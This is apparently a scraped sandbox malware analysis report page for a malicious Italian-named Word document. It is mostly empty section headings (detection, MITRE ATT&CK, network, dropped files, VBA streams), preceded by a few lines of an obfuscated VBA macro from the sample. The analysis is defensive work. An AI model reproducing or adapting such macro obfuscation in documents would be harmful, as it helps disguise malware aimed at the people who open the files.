73	w5XZFSu = aGJjAH - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(F97Z_Sb) - 6977 - Q0hGCzd - ojvDCQi * Sin(wNX30a)	aGJjAH ChrW Oct CDate Fix F97Z_Sb Q0hGCzd ojvDCQi Sin wNX30a
74	Next	t3Fh05z
75	Loop Until qaB0m7mo = E9cRqzhV	qaB0m7mo E9cRqzhV
76	End Function

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Nuovo_documento_2019.09.20.doc

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Nuovo_documento_2019.09.20.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: JIodCjfv.bas, Stream Size: 5179

General

VBA Code Keywords

VBA Code

VBA File Name: ThisDocument.cls, Stream Size: 3527